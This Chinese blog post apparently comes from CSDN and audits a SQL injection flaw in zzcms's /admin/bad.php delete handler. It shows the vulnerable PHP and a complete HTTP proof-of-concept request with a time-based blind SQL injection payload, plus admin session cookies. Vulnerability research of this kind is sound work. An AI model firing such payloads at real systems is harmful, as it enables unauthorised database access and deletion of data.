zzcms sql注入分析

最新推荐文章于 2024-03-02 11:00:00 发布
最新推荐文章于 2024-03-02 11:00:00 发布
阅读量519 收藏
点赞数
分类专栏: 代码审计 文章标签: sql 数据库 java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wuguojiuai/article/details/127542293
版权
本文探讨了zzcms系统在/admin/bad.php文件中存在的一处SQL注入漏洞。当action参数值为'del'时,SQL语句未经任何过滤直接执行,揭示了系统在数据库操作上的安全缺陷。
摘要由CSDN通过智能技术生成

没有代码基础的同学可以看下:【零基础】php代码审计之sql注入_小韩韩啊的博客-CSDN博客_php代码审计sql注入

漏洞文件:

/admin/bad.php

<?php include("admin.php");?>
...
#line 10-41
checkadminisdo("badusermessage");
$action=isset($_REQUEST["action"])?$_REQUEST["action"]:'';
if ($action<>""){
	$id="";
	if(!empty($_POST['id'])){
    	for($i=0; $i<count($_POST['id']);$i++){
    	$id=$id.($_POST['id'][$i].',');
    	}
	$id=substr($id,0,strlen($id)-1);//去除最后面的","
	}

	if ($id==""){
	echo "<script>alert('操作失败!至少要选中一条信息。');history.back();</script>";
	}
}
if ($action=="del"){
	 if (strpos($id,",")>0){
		$sql="delete from zzcms_bad where id in (". $id .")";
	}else{
		$sql="delete from zzcms_bad where id='$id'";
	}

query($sql);
echo "<script>location.href='bad.php'</script>";
}
if ($action=="lockip"){
	 if (strpos($id,",")>0){
		$sql="update  zzcms_bad set lockip=1 where id in (". $id .")";
	}else{
		$sql="update  zzcms_bad set lockip=1 where id='$id'";
	}
query($sql);

可以很明显看到:

action=="del" 下面应用sql语句不存在任何过滤,

被直接带入到了query中执行。

POST /admin/bad.php HTTP/1.1
Host: your host
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.7113.93 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 69
Origin: http://zzcms.com
Connection: close
Referer: http://zzcms.com/admin/bad.php
Cookie: askbigclassid=0; asksmallclassid=0; __tins__713776=%7B%22sid%22%3A%201629992898141%2C%20%22vd%22%3A%206%2C%20%22expires%22%3A%201629995107025%7D; __51cke__=; __51laig__=20; bdshare_firstime=1629951198125; PHPSESSID=a5tlfr6q1ete0aaa6dq5pppi43; admin=admin; pass=21232f297a57a5a743894a0e4a801fc3; UserName=test; PassWord=098f6bcd4621d373cade4e832627b4f6
Upgrade-Insecure-Requests: 1

action=del&id[0]=0&id[1]=1 AND (SELECT 5584 FROM (SELECT(SLEEP(9)))a)
小韩韩啊
关注
专栏目录
ZZCMS201910审计入门和SQL注入
网络设备配置-华为
11-09 684
php代码审计
(代码审计)zzcms前台SQL注入
Cobra的博客
04-20 626
代码审计
usercheck php,zzcms user/logincheck.php SQL注入漏洞
weixin_39844963的博客
03-20 130
inc/function.php 72行```phpfunction getip(){if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown"))$ip = getenv("HTTP_CLIENT_IP");else if (getenv("HTTP_X_FORWARDED_FOR"...
ZZCMS8.3 dl/dl_sendmail.php SQL注入
weixin_42813492的博客
07-27 4215
一、 源代码分析 先来看一下源代码,漏洞位置位于 dl/dl_sendmail.php 第74行 根据代码可知SQL语句为post提交,中间并未进行过过滤,因此此处存在SQL注入 二、 复现步骤 POC如下: import requests url = “http://10.10.10.39:8080/dl/dl_sendmail.php” cookies = ...
Ares-X#VulWiki#(CVE-2018-14961)Zzcms 8.3 前台sql注入1
07-25
一、漏洞简介 二、漏洞影响 三、复现过程
zzcms8.1.7z
11-24
ZZCMS v8.1注重安全防护,包括SQL注入、XSS攻击等常见漏洞的防范,同时提供定期备份和恢复功能,保障数据安全。 5. **性能优化** 通过缓存机制、页面静态化等手段,ZZCMS v8.1能够有效提升网站的加载速度和响应...
zzcms8.3.zip
08-26
1. 安全性检查:代码审计是确保软件安全的重要步骤,ZZCMS 8.3 的源码提供了实践机会,可以学习如何检查SQL注入、XSS攻击、CSRF漏洞等常见安全问题。通过对输入验证、数据过滤、权限控制等方面的分析,我们可以了解...
ZZCMS v8.2 前台Insert注入+任意文件删除
weixin_33935505的博客
03-29 335
前几天看了水泡泡老哥的zzcms的审计,在论坛上一搜发现这个cms有不少洞。听说很适合小白练手,所以来瞅一瞅。不知道我发现的这个洞是不是已经被爆过了,如果雷同,纯属巧合。 一.Insert注入,直接返回数据 先从默认页index.php入手: 跟进inc/conn.php看一下: 发现include了好多文件,可以看一下每一行的注释,大多数都是定义一些常量。只有inc/function.php...
zzcms网站管理系统 v1.0
03-29
为达到最佳效果,推荐使用九网互联的PHP全能空间,支持Zend、MySQL。程序说明ZZCMS是一个免费的开源的网站管理系统,目前功能主要用于个人网站建设和企业网站建设,欢迎你的加入,请提出你宝贵的意见,在此感谢!采用PHP+MYSQL开发开发环境:php5.0 mysql5.0特点:简单易用,灵活的函数调用MVC模式开发多级栏目分类采用著名的FCK编辑器为后台编辑器目前具有模块:单页、文章、图片、下载、友情连接程序安装路径:http://你的网站地址/install后台路径:http://你的网站地址/admin/AdminLogin.php更多内容请登录:http://www.zzcms.com因为程序要不断更新函数调用方法,请到官方网站查询
sql手工注入练习拿flag
太阳照耀我走四方
02-14 2748
sql手工简单注入拿flag
i春秋:无处不在的SQL注入
MyBack
06-01 3699
实验环境 实验环境 操作机:Windows XP 目标机:Windows 2003 目标网址:www.test.ichunqiu实验工具:sqlmap注入工具 实验目的 本节课程通过对SQL注入的演示,让大家了解SQL注入漏洞的方式,并学习应对此种漏洞的防御方法。 实验思路 手工检测判断注入点利用SQLMap注入数据库获取数据库信息防御
Web安全之SQL注入
qq_42751192的博客
06-09 2319
SQL注入SQL lnjection)是发生在 Web 程序中数据库层的安全漏洞,是比较常用的网络攻击方式之一,他不是利用操作系统的 BUG 来实现攻击,而是针对程序员编写时的疏忽,通过 SQL 语句,实现无账号登录,甚至修改数据库。也就是说,SQL 注入就是在用户输入的字符串中添加 SQL 语句,如果在设计不良的程序中忽略了检查,那么这些注入进去的 SQL 语句就会被数据库服务器误认为是正常的 SQL 语句而运行,攻击者就可以执行计划外的命令或者访问未授权的数据。
ZZCMS201910代码审计
最新发布
wangluoanquan111的博客
03-02 890
现在开始分析zzcms中 产生sql注入的原理以及代码审计的过程。先用seay审计大概过一遍此cms中可能存在的漏洞,然后在admin/ask.php的文件看到这个可能存在漏洞的点,这里的sql语句中$_COOKIE[“askbigclassid”]这个参数可控,此时就有一个想法我是不是可以将我所想查询的内容通过构造特殊的sql语句插入到这个变量中,进行自己想查询的东西,这里是不是就完成了一个sql注入攻击。
ZZCMS搭建
weixin_53323333的博客
06-22 837
4.傻瓜式下一步。
CVE-2021-40280
m0_51674437的博客
07-28 439
CVE-2021-40280漏洞复现
如何使用phpstudy在服务器上发布Discuz_X3.4_SC_UTF8_20220811和zzcms2023
qq_45169358的博客
12-02 923
如何使用phpstudy在服务器上发布Discuz_X3.4_SC_UTF8_20220811和zzcms2023
118修复_zzcms8.2 admin 登录验证不通过修复 & sort命令
weixin_39627052的博客
12-26 256
zzcms8.2 admin 登录验证不通过修复 审计sort命令zzcms8.2 admin 登录验证不通过修复 审计login.php
ZZCMS 201910代码审计1: 分析ZZCMS中的SQL注入原理和过程
通过思维导图和相关的分析,我们开始分析ZZCMS中产生SQL注入的原理以及代码审计的过程。 SQL注入漏洞原理及其分析 为了弄清楚ZZCMSSQL注入漏洞的原理以及进行代码审计的过程,首先我们需要了解SQL注入漏洞的原理...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

小韩韩啊

你的鼓励是对我最大的支持

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值